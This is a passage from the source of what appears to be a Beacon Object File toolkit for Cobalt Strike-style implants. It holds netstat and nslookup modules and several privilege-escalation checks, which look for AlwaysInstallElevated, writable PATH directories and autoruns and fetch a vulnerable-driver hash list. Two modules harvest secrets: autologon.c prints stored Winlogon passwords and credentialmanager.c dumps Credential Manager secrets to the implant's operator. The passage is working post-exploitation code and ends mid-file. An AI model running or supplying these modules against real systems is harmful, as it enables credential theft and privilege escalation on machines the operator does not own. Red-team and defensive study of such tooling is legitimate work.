               GetIpHostName(FALSE, row.dwRemoteAddr, RemoteIp, HOSTNAMELEN);
               GetPortName(row.dwRemotePort, "tcp", RemotePort, PORTNAMELEN);
               MSVCRT$sprintf(Remote, "%s:%s", RemoteIp, RemotePort);
           }
	   DWORD pid = row.dwOwningPid;
	   char name[MAX_PATH];
	   for(int i=0; i<MAX_PATH; i++) { name[i] = '\x00'; }
	   DWORD size = MAX_PATH;
	   DWORD* sizep = &size;
	   GetNameByPID(pid, name, sizep);
	   size = (*sizep);
           internal_printf("  %-4s %-22s %-22s %11s %75s (%5i)\n", "TCP", Host, Remote, TcpState[row.dwState], name, pid);
//           internal_printf("  %-6s %-22s %-22s %s\n", "TCP", Host, Remote, TcpState[row.dwState]);
        }
    }
    intFree(ptTable);
    ShowUdpTable();
    return;
}


VOID go(
        IN PCHAR Buffer,
        IN ULONG Length
)
{
        if(!bofstart())
        {
                return;
        }
        Netstat();
        printoutput(TRUE);
};


================================================
FILE: SAL-BOF/nslookup/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/nslookup/nslookup.c
================================================
#include <windows.h>
#include <windns.h>
#include "base.c"

typedef PCWSTR (*myInetNtopW)(
  INT        Family,
  const VOID *pAddr,
  PWSTR      pStringBuf,
  size_t     StringBufSize
);


void query_domain(const char * domainname, unsigned short wType, const char * dnsserver)
{
    PDNS_RECORD pdns = NULL, base = NULL;
    DWORD options = DNS_QUERY_WIRE_ONLY; 
    DWORD status = 0;
    struct in_addr inaddr = {0};
    PIP4_ARRAY pSrvList = NULL;
    unsigned int i = 0;
    LPSTR errormsg = NULL;
    DNS_FREE_TYPE freetype;
    HMODULE WS = LoadLibraryA("WS2_32");
    myInetNtopW inetntow;
    int (*intinet_pton)(INT, LPCSTR, PVOID);
    if(WS == NULL)
    {
        BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib");
        return;
    }
    else
    {
        inetntow = (myInetNtopW)GetProcAddress(WS, "InetNtopW");
        intinet_pton = (int (*)(INT,LPCSTR,PVOID))GetProcAddress(WS, "inet_pton");
        if(!inetntow || !intinet_pton)
        {
            BeaconPrintf(CALLBACK_ERROR, "Could not load functions");
            goto END;
        }
    }
    
    freetype = DnsFreeRecordListDeep; //since when was a define not good enough for microsoft
    if(dnsserver != NULL) // I am assuming dnsserver is never set with cacheOnly
    {
        pSrvList = (PIP4_ARRAY)KERNEL32$LocalAlloc(LPTR, sizeof(IP4_ARRAY));
        if (!pSrvList)
        {
            BeaconPrintf(CALLBACK_ERROR, "could not allocate memory");      
            goto END;
        }
        if(intinet_pton(AF_INET, dnsserver, &(pSrvList->AddrArray[0])) != 1)
        {
            BeaconPrintf(CALLBACK_ERROR, "Could not convert dnsserver from ip to binary");
            KERNEL32$LocalFree(pSrvList);
            goto END;
        }
    //   pSrvList->AddrArray[0] = WSOCK32$inet_addr(dnsserver); //DNS (ASCII) to  IP address
    //   pSrvList->
        pSrvList->AddrCount = 1; 
        options = DNS_QUERY_WIRE_ONLY;
    }
    status = DNSAPI$DnsQuery_A(domainname, wType, options, pSrvList, &base, NULL);
    if(pSrvList != NULL)
        KERNEL32$LocalFree(pSrvList);
    pdns = base;
    if(status != 0 || pdns == NULL)
    {
		internal_printf("Query for domain name failed\n");
		status = KERNEL32$FormatMessageA(
			FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
			NULL,
			status,
			0,
			(LPSTR)&errormsg,
			0,
			NULL
		);
		if(status ==0)
			internal_printf("unable to convert error message\n");
		else
		{
			internal_printf("%s", errormsg);
			KERNEL32$LocalFree(errormsg);
		}
        goto END;
    }

    //this logic was modified from https://www.codeproject.com/Articles/21246/DNS-Query-MFC-based-Application DnsView.cpp
    do {

            if(pdns->wType == DNS_TYPE_A)
            {
                DWORD test = pdns->Data.A.IpAddress;
                internal_printf("A %s %lu.%lu.%lu.%lu\n", pdns->pName, test & 0x000000ff, (test & 0x0000ff00) >> 8, (test & 0x00ff0000) >> 16, (test & 0xff000000) >> 24);
            }else if(pdns->wType == DNS_TYPE_NS){
                    internal_printf("NS %s %s\n", pdns->pName, pdns->Data.NS.pNameHost);
            }else if(pdns->wType == DNS_TYPE_MD){
                    internal_printf("MD %s %s\n", pdns->pName, pdns->Data.MD.pNameHost);
            }else if(pdns->wType == DNS_TYPE_MF){

                    internal_printf("MF %s %s\n", pdns->pName, pdns->Data.MF.pNameHost);
            }else if(pdns->wType == DNS_TYPE_CNAME){
                    internal_printf("CNAME %s %s\n", pdns->pName, pdns->Data.CNAME.pNameHost);
            }else if(pdns->wType == DNS_TYPE_SOA){

                    internal_printf("SOA %s  nameserv: %s\r\n", pdns->pName, pdns->Data.SOA.pNamePrimaryServer);
                    internal_printf("     admin: %s\r\n", pdns->Data.SOA.pNameAdministrator);
                    internal_printf("    serial: %lu\r\n", pdns->Data.SOA.dwSerialNo);
                    internal_printf("   refresh: %lu\r\n", pdns->Data.SOA.dwRefresh);
                    internal_printf("       ttl: %lu\r\n", pdns->Data.SOA.dwDefaultTtl);
                    internal_printf("    expire: %lu\r\n", pdns->Data.SOA.dwExpire);
                    internal_printf("     retry: %lu", pdns->Data.SOA.dwRetry);
            }else if(pdns->wType == DNS_TYPE_MB){
                    internal_printf("MB %s %s\n", pdns->pName, pdns->Data.MB.pNameHost);
            }else if(pdns->wType == DNS_TYPE_MG){
                    internal_printf("MG %s %s\n", pdns->pName, pdns->Data.MG.pNameHost);
            }else if(pdns->wType == DNS_TYPE_MR){

                    internal_printf("MR %s %s\n", pdns->pName, pdns->Data.MR.pNameHost);
            }else if(pdns->wType == DNS_TYPE_WKS){

                    inaddr.S_un.S_addr = pdns->Data.WKS.IpAddress;
                    //internal_printf("WKS %s [%s] proto: %d mask: %d\n", pdns->pName, WS2_32$inet_ntoa(inaddr), pdns->Data.WKS.chProtocol, pdns->Data.WKS.BitMask);
            }else if(pdns->wType == DNS_TYPE_PTR){

                    internal_printf("PTR %s %s\n", pdns->pName, pdns->Data.PTR.pNameHost);
            }else if(pdns->wType == DNS_TYPE_HINFO){

                    internal_printf("HINFO %s\n", pdns->pName);
                    for (i = 0; i < pdns->Data.HINFO.dwStringCount; i++) {
                            internal_printf("%s\n", pdns->Data.HINFO.pStringArray[i]);
                    }
            }else if(pdns->wType == DNS_TYPE_MINFO){
                    internal_printf("MINFO %s err: %s name: %s\n", pdns->pName, pdns->Data.MINFO.pNameErrorsMailbox, pdns->Data.MINFO.pNameMailbox);
            }else if(pdns->wType == DNS_TYPE_MX){

                    internal_printf("MX %s %s pref: %d\n", pdns->pName, pdns->Data.MX.pNameExchange, pdns->Data.MX.wPreference);
            }else if(pdns->wType == DNS_TYPE_TEXT){

                    internal_printf("TEXT %s\n", pdns->pName);
                    for (i = 0; i < pdns->Data.TXT.dwStringCount; i++) {
                            internal_printf("%s\n", pdns->Data.TXT.pStringArray[i]);
                    }
            }else if(pdns->wType ==DNS_TYPE_RP){

                    internal_printf("RP %s err: %s name: %s\n", pdns->pName, pdns->Data.RP.pNameErrorsMailbox, pdns->Data.RP.pNameMailbox);
            }else if(pdns->wType == DNS_TYPE_AFSDB){

                    internal_printf("AFSDB %s %s pref: %d\n", pdns->pName, pdns->Data.AFSDB.pNameExchange, pdns->Data.AFSDB.wPreference);
            }else if(pdns->wType == DNS_TYPE_X25){

                    internal_printf("X25 %s\n", pdns->pName);
                    for (i = 0; i < pdns->Data.X25.dwStringCount; i++) {
                            internal_printf("%s\n", pdns->Data.X25.pStringArray[i]);
                    }
            }else if(pdns->wType == DNS_TYPE_ISDN){

                    internal_printf("ISDN %s\n", pdns->pName);
                    for (i = 0; i < pdns->Data.ISDN.dwStringCount; i++) {
                            internal_printf("%s\n", pdns->Data.ISDN.pStringArray[i]);
                    }
            }else if(pdns->wType == DNS_TYPE_RT){

                    internal_printf("RT %s %s pref: %d\n", pdns->pName, pdns->Data.RT.pNameExchange, pdns->Data.RT.wPreference);
            }else if(pdns->wType == DNS_TYPE_AAAA){

                    internal_printf("AAAA %s [", pdns->pName);
                    for (i = 0; i < 16; i++) {
                            internal_printf("%d", pdns->Data.AAAA.Ip6Address.IP6Byte[i]);
                            if (i != 15)
                                    internal_printf(".");
                    }
                    internal_printf("]\n");
            }else if(pdns->wType == DNS_TYPE_SRV){

                    internal_printf("SRV %s %s port:%d prior:%d weight:%d\n", pdns->pName, pdns->Data.SRV.pNameTarget, pdns->Data.SRV.wPort, pdns->Data.SRV.wPriority, pdns->Data.SRV.wWeight);
            }else if(pdns->wType == DNS_TYPE_WINSR){

                    internal_printf("NBSTAT %s %s\n", pdns->pName, pdns->Data.WINSR.pNameResultDomain);
            }else if(pdns->wType == DNS_TYPE_KEY){

                    internal_printf("DNSKEY %s: flags %d, Protocol %d, Algorithm %d\n", pdns->pName, pdns->Data.KEY.wFlags, pdns->Data.KEY.chProtocol, pdns->Data.KEY.chAlgorithm);
            }else{

                    internal_printf("type unhandled\n");
            }    

        pdns = pdns->pNext;
    } while (pdns);
    END:
    if(base)
    {DNSAPI$DnsFree(base, freetype);}
    FreeLibrary(WS);

}

unsigned int get_record_mapping(const char *record) {
    if (record == NULL) {
        return 0; 
    }
   
    if (MSVCRT$strcmp(record, "A") == 0) return 0x1;
    else if (MSVCRT$strcmp(record, "NS") == 0) return 0x2;
    else if (MSVCRT$strcmp(record, "MD") == 0) return 0x3;
    else if (MSVCRT$strcmp(record, "MF") == 0) return 0x4;
    else if (MSVCRT$strcmp(record, "CNAME") == 0) return 0x5;
    else if (MSVCRT$strcmp(record, "SOA") == 0) return 0x6;
    else if (MSVCRT$strcmp(record, "MB") == 0) return 0x7;
    else if (MSVCRT$strcmp(record, "MG") == 0) return 0x8;
    else if (MSVCRT$strcmp(record, "MR") == 0) return 0x9;
    else if (MSVCRT$strcmp(record, "WKS") == 0) return 0xb;
    else if (MSVCRT$strcmp(record, "PTR") == 0) return 0xc;
    else if (MSVCRT$strcmp(record, "HINFO") == 0) return 0xd;
    else if (MSVCRT$strcmp(record, "MINFO") == 0) return 0xe;
    else if (MSVCRT$strcmp(record, "MX") == 0) return 0xf;
    else if (MSVCRT$strcmp(record, "TEXT") == 0) return 0x10;
    else if (MSVCRT$strcmp(record, "RP") == 0) return 0x11;
    else if (MSVCRT$strcmp(record, "AFSDB") == 0) return 0x12;
    else if (MSVCRT$strcmp(record, "X25") == 0) return 0x13;
    else if (MSVCRT$strcmp(record, "ISDN") == 0) return 0x14;
    else if (MSVCRT$strcmp(record, "RT") == 0) return 0x15;
    else if (MSVCRT$strcmp(record, "AAAA") == 0) return 0x1c;
    else if (MSVCRT$strcmp(record, "SRV") == 0) return 0x21;
    else if (MSVCRT$strcmp(record, "WINSR") == 0) return 0xff02;
    else if (MSVCRT$strcmp(record, "KEY") == 0) return 0x19;
    else if (MSVCRT$strcmp(record, "ANY") == 0) return 0xff;

    return 0;
}

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	datap parser;
	char * target = NULL;
	char * server = NULL;
        const char * s_type = NULL;
	unsigned short type;

	if(!bofstart())
	{
		return;
	}
	BeaconDataParse(&parser, Buffer, Length);
	target = BeaconDataExtract(&parser, NULL);
        s_type = BeaconDataExtract(&parser, NULL);
	server = BeaconDataExtract(&parser, NULL);
        type = get_record_mapping(s_type);
        if(server[0] == 0)
                server = NULL;
	query_domain(target, type, server);
	printoutput(TRUE);
}


================================================
FILE: SAL-BOF/privcheck/alwaysinstallelevated.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof(arr[0]))

void go() {
    HKEY hKey;
    DWORD alwaysInstallElevated = 0;
    DWORD bufferSize = sizeof(DWORD);
    const TCHAR* subkeys[] = {
        TEXT("HKEY_CURRENT_USER"),
        TEXT("HKEY_LOCAL_MACHINE")
    };

    for (int i = 0; i < ARRAY_SIZE(subkeys); i++) {
        if (ADVAPI32$RegOpenKeyExA((i == 0) ? HKEY_CURRENT_USER : HKEY_LOCAL_MACHINE,
            TEXT("Software\\Policies\\Microsoft\\Windows\\Installer"),
            0,
            KEY_QUERY_VALUE,
            &hKey) == ERROR_SUCCESS) {

            if (ADVAPI32$RegQueryValueExA(hKey,
                TEXT("AlwaysInstallElevated"),
                NULL,
                NULL,
                (LPBYTE)&alwaysInstallElevated,
                &bufferSize) == ERROR_SUCCESS) {

                if (alwaysInstallElevated == 1) {
                    BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Always Install Elevated Check Result: Vulnerable\n", subkeys[i]);
                }
                else {
                    BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Always Install Elevated Check Result: Not Vulnerable\n", subkeys[i]);
                }
            }
            else {
                BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Unable to query AlwaysInstallElevated value.\n", subkeys[i]);
            }
            ADVAPI32$RegCloseKey(hKey);
        }
        else {
            BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Registry key for AlwaysInstallElevated does not seem to exist.\n", subkeys[i]);
        }
    }
}


================================================
FILE: SAL-BOF/privcheck/autologon.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

void go() {
    HKEY hKey = NULL;
    DWORD dwSize = 0;
    DWORD dwType = 0;
    char szAutoLogon[16] = {0};
    char szUserName[256] = {0};
    char szDomain[256] = {0};
    char szPassword[256] = {0};
    BOOL bAutoLogonFound = FALSE;
    BOOL bUserNameFound = FALSE;
    BOOL bDomainFound = FALSE;
    BOOL bPasswordFound = FALSE;
    LONG lResult = 0;

    lResult = ADVAPI32$RegOpenKeyExA( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, KEY_READ, &hKey );
    if (lResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] Failed to open Winlogon registry key (error: 0x%lX)\n", lResult);
        return;
    }

    dwSize = sizeof(szAutoLogon);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "AutoAdminLogon", NULL, &dwType, (LPBYTE)szAutoLogon, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] AutoAdminLogon: %s\n", szAutoLogon);
        bAutoLogonFound = TRUE;
    }

    dwSize = sizeof(szDomain);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "DefaultDomainName", NULL, &dwType, (LPBYTE)szDomain, &dwSize);
    if (lResult == ERROR_SUCCESS && szDomain[0] != '\0') {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultDomainName: %s\n", szDomain);
        bDomainFound = TRUE;
    }

    dwSize = sizeof(szUserName);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "DefaultUserName", NULL, &dwType, (LPBYTE)szUserName, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultUserName: %s\n", szUserName);
        bUserNameFound = TRUE;
    }

    dwSize = sizeof(szPassword);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "DefaultPassword", NULL, &dwType, (LPBYTE)szPassword, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultPassword: %s\n", szPassword);
        bPasswordFound = TRUE;
    }

    if (!bAutoLogonFound) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] AutoAdminLogon: Not Found\n");
    }
    if (!bUserNameFound) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultUserName: Not Found\n");
    }
    if (!bPasswordFound) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultPassword: Not Found\n");
    }

    if (bAutoLogonFound && szAutoLogon[0] == '1' && bPasswordFound) {
        if (bDomainFound) {
            BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] VULNERABLE: Autologon credentials stored: %s\\%s:%s\n", szDomain, szUserName, szPassword);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] VULNERABLE: Autologon credentials stored: %s:%s\n", szUserName, szPassword);
        }
    } else if (bAutoLogonFound && szAutoLogon[0] == '1') {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] AutoAdminLogon enabled but no DefaultPassword found. Password may be in LSA secrets.\n");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] Not vulnerable: Autologon not enabled or no credentials stored\n");
    }

    ADVAPI32$RegCloseKey(hKey);
}


================================================
FILE: SAL-BOF/privcheck/credentialmanager.c
================================================
#include <windows.h>
#include <stdio.h>
#include <wincred.h>
#include "beacon.h"
#include "bofdefs.h"

void go() {
    DWORD dwCount = 0;
    PCREDENTIALA *pCredentials = NULL;

    if (!ADVAPI32$CredEnumerateA(NULL, 0, &dwCount, &pCredentials)) {
        DWORD dwErr = KERNEL32$GetLastError();
        if (dwErr == ERROR_NOT_FOUND) {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] No credentials found in Credential Manager\n");
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] Error enumerating credentials: 0x%lX\n", dwErr);
        }
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] Found %lu credential(s)\n", dwCount);

    for (DWORD i = 0; i < dwCount; i++) {
        BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] --- Credential [%lu] ---\n", i + 1);

        if (pCredentials[i]->TargetName != NULL) {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   Target: %s\n", pCredentials[i]->TargetName);
        }

        if (pCredentials[i]->UserName != NULL) {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   User:   %s\n", pCredentials[i]->UserName);
        }

        if (pCredentials[i]->CredentialBlobSize > 0 && pCredentials[i]->CredentialBlob != NULL) {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   Secret: %.*s\n",
                pCredentials[i]->CredentialBlobSize,
                (char*)pCredentials[i]->CredentialBlob);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   Secret: <empty or protected>\n");
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] Enumeration complete: %lu credential(s) found\n", dwCount);

    ADVAPI32$CredFree(pCredentials);
}


================================================
FILE: SAL-BOF/privcheck/download_vulnerable_driver_list.py
================================================
import csv
import sys
from urllib.request import urlopen, Request

'''
if len(sys.argv) > 1:
    OUTPUT_PATH = sys.argv[1]
else:
    OUTPUT_PATH = "."

CSV_FILE = OUTPUT_PATH + "/drivers.csv"
HASH_OUTPUT_FILE = "./privcheck/vulndrivers.h"
'''

CSV_FILE = "/tmp/drivers.csv"
HASH_OUTPUT_FILE = "vulndrivers.h"

# Download CSV with all vulnerable hashes
driverreq = Request("https://www.loldrivers.io/api/drivers.csv")
try:
    with urlopen(driverreq) as response:
        if response.getcode() == 200:
            with open(CSV_FILE, "wb") as file:
                file.write(response.read())
        else:
            print(f"Request failed with status code: {response.getcode()}")
except Exception as e:
    print(f"An error occured: {e}")


# Extract relevant hashes
hashes = set()

with open(CSV_FILE, 'r') as file:
    reader = csv.DictReader(file)
    for row in reader:
        # Check if 'Category' matches
        category = row.get("Category", "").strip().lower()
        if category in ["vulnerable driver", "vulnerable drivers"]:
            # Collect SHA1, SHA256 and MD5 hashes if present
            sha1_hash = row.get("KnownVulnerableSamples_SHA1", "").strip().upper()
            sha256_hash = row.get("KnownVulnerableSamples_SHA256", "").strip().upper()
            md5_hash = row.get("KnownVulnerableSamples_MD5", "").strip().upper()

            # Add hashes to the set (to ensure uniqueness)
            if sha1_hash:
                hashes.update(sha1_hash.split(','))
            if sha256_hash:
                hashes.update(sha256_hash.split(','))
            if md5_hash:
                hashes.update(md5_hash.split(','))


# Format as C array in header file
with open(HASH_OUTPUT_FILE, 'w') as file:
    file.write("#include <windows.h>\n")
    file.write("#ifndef VULNDRIVERS_H\n")
    file.write("#define VULNDRIVERS_H\n\n")
    file.write("const char* VulnerableHashes[] = {\n")

    for hash_value in sorted(hashes):
        hash_value = hash_value.strip()
        if hash_value:  # Ignore empty values
            file.write(f'    "{hash_value}",\n')

    file.write("    NULL // End of array\n")
    file.write("};\n\n")
    file.write("#endif // VULNDRIVERS_H\n")
    file.close()

print(f"[*] {HASH_OUTPUT_FILE} updated")

================================================
FILE: SAL-BOF/privcheck/hijackablepath.c
================================================
#include <windows.h>
#include <string.h>
#include "bofdefs.h"
#include "beacon.h"
#include <processthreadsapi.h>

void go() {
    HKEY hKey;
    LONG openResult;
    LONG queryResult;
    DWORD valueType;
    char data[1024];
    DWORD dataSize = sizeof(data);
    DWORD len;
    HANDLE hToken, hImpersonatedToken;
    DWORD GenericAccess = FILE_ADD_FILE;
    int NumOfWritablePaths = 0;

    openResult = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", 0, KEY_READ, &hKey);
    if (openResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT,"[WRITABLE_PATH] Error opening registry key: %d\n", openResult);
    }

    queryResult = ADVAPI32$RegQueryValueExA(hKey, "Path", NULL, &valueType, (LPBYTE)data, &dataSize);
    if (queryResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT,"[WRITABLE_PATH] Error querying registry value: %d\n", queryResult);
        ADVAPI32$RegCloseKey(hKey);
        return;
    }

    char* pathToken = MSVCRT$strtok(data, ";");
    while (pathToken != NULL) {
        DWORD attributes = KERNEL32$GetFileAttributesA(pathToken);
        if (attributes != INVALID_FILE_ATTRIBUTES && (attributes & FILE_ATTRIBUTE_DIRECTORY)) {

            // Get length needed to allocate for the security descriptor.
            if (!ADVAPI32$GetFileSecurityA(pathToken, OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, NULL, 0, &len) && ERROR_INSUFFICIENT_BUFFER == KERNEL32$GetLastError()) {
                // Allocate space needed for security descriptor
                PSECURITY_DESCRIPTOR security = MSVCRT$malloc(len);
                // If space allocated, then obtain the security descriptor
                if (security && ADVAPI32$GetFileSecurityA(pathToken, OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, security, len, &len)) {
                    // The AccessCheck API requires an impersonation token
                    if (ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_DUPLICATE | STANDARD_RIGHTS_READ, &hToken)) {
                        // Duplicate the necessary token
                        if (ADVAPI32$DuplicateToken(hToken, SecurityImpersonation, &hImpersonatedToken)) {
                            GENERIC_MAPPING mapping = {
                                    FILE_GENERIC_READ,
                                    FILE_GENERIC_WRITE,
                                    FILE_GENERIC_EXECUTE,
                                    FILE_ALL_ACCESS
                            };

                            PRIVILEGE_SET privileges = { 0 };
                            DWORD grantedAccess = 0, privilegesLength = sizeof(privileges);
                            BOOL result = FALSE;

                            // Check if we have FILE_ADD_FILE access
                            if (ADVAPI32$AccessCheck(security, hImpersonatedToken, GenericAccess, &mapping, &privileges, &privilegesLength, &grantedAccess, &result)) {
                                if (result) {
                                    BeaconPrintf(CALLBACK_OUTPUT,"[WRITABLE_PATH] Found writable directory in PATH: %s\n", pathToken);
                                    NumOfWritablePaths++;
                                }
                            }
                            KERNEL32$CloseHandle(hImpersonatedToken);
                        }
                        KERNEL32$CloseHandle(hToken);
                    }
                    MSVCRT$free(security);
                }
                
            }
        }
        pathToken = MSVCRT$strtok(NULL, ";");
    }
    ADVAPI32$RegCloseKey(hKey);
    BeaconPrintf(CALLBACK_OUTPUT,"[WRITABLE_PATH] Found %d writable directories in PATH\n", NumOfWritablePaths);
}


================================================
FILE: SAL-BOF/privcheck/modifiableautorun.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

void go() {
    HKEY hKey = NULL;
    LONG lResult = 0;
    char szValueName[256];
    char szValueData[512];
    char szPath[512];
    DWORD dwValueNameSize = 0;
    DWORD dwValueDataSize = 0;
    DWORD dwType = 0;
    DWORD dwIndex = 0;
    int nFound = 0;
    int p = 0;
    int q = 0;
    HANDLE hFile = INVALID_HANDLE_VALUE;

    const char* pszHives[] = { "HKLM", "HKCU" };
    HKEY hRoots[] = { HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER };

